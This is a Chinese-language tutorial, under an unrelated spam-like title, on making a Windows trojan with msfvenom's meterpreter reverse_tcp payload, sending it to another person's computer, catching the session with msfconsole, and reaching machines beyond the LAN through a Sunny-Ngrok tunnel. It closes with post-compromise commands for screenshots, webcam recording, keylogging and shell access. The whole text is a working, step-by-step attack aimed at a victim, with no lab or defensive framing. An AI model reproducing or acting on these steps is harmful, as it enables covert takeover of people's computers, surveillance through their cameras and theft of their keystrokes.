php地方門戶新聞網(wǎng)站源碼卡點視頻軟件下載
生成木馬文件,從而控制對方電腦(這里只能在同一個局域網(wǎng)下才能入侵)
第一步:輸入msfvenom命令生成一個payload,相關參數(shù)與命令如下:
-p:使用反向遠程控制程序“windows/meterpreter/reverse_tcp”
lhost:設置kali的IP
lport:設置端口(要與下面的setlport保持一致)
-f:文件的類型為exe類型
-o:生成payload,名為payload.exe,保存在kali的/root目錄下
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/tjy.exe
第二步:將生成的木馬文件發(fā)送到對方電腦
我們啟動kali
msfconsole 進入msfconsole
use exploit/multi/handler 使用這個漏洞輔助
設置payload為剛才反向遠程控制程序名稱(windows/meterpreter/reverse_tcp)
set payload windows/meterpreter/reverse_tcp
設置一個lhost和lport,要與文章最開始的msfvenom命令中的IP和端口保持一致
exploit 或 run
接下來我們只要等對方電腦運行剛剛那個木馬
生成木馬文件,從而控制對方電腦(內(nèi)網(wǎng)可以入侵外網(wǎng))
在開始生成木馬之前,我們要先做好準備工作
在kali里面要下載Sunny-Ngrok的Linux64版本,下載好后解壓
接著我們要在Sunny-Ngrok注冊登陸,這里要買個隧道,但是免費的,就是認證要花2元,這個隧道是幫助我們做內(nèi)網(wǎng)穿透的,但這個免費的隧道服務器在美國那邊,所以有的時候可能不太好用
這里將下載好的linux64壓縮包進行解壓
命令解壓縮:unzip linux_amd64(壓縮包名)
進入解壓好的目錄
cd linux_amd64
啟動隧道映射TCP服務
./sunny clientid (隧道id) 這里的隧道id看下圖
啟動后是這樣的
接下來就是生成外網(wǎng)的木馬程序了
注意:這里lhost和lport分別為贈送的域名和端口
msfvenom -p windows/meterpreter/reverse_tcplhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe
接下來就是在msf中設置payload,加載攻擊模塊設置本地IP何監(jiān)聽端口了
msfconsole 打開msf
use exploit/multi/handler 使用這個漏洞輔助
set payload windows/meterpreter/reverse_tcp 設置payload為剛才反向遠程控制程序名稱(windows/meterpreter/reverse_tcp)
set LHOST 192.168.245.140 這里設置成kali的IP
set LPORT 4444 這里是你要偵聽的端口
這里設置的IP和偵聽的端口后生成外網(wǎng)木馬程序時的IP和端口時不一樣的,因為我們這是內(nèi)網(wǎng)入侵外網(wǎng)
show options 查看IP端口設置情況
exploit 或 run 開啟偵聽
接下來我們只要等對方電腦運行剛剛那個木馬
成功后時以下這圖
入侵成功后所能做的(這只是可以做的一部分)
getuid 獲取靶機uidmeterpreter
shell 進入靶機shellmeterpreter
screenshot 靶機截屏meterpreter
webcam_snap 用靶機攝像頭拍照meterpreter
webcam_stream 用靶機攝像頭錄像meterpreter
keyscan_start 開啟鍵盤記錄meterpreter
keyscan_dump 捕獲鍵盤記錄
keyscan_stop 停止鍵盤記錄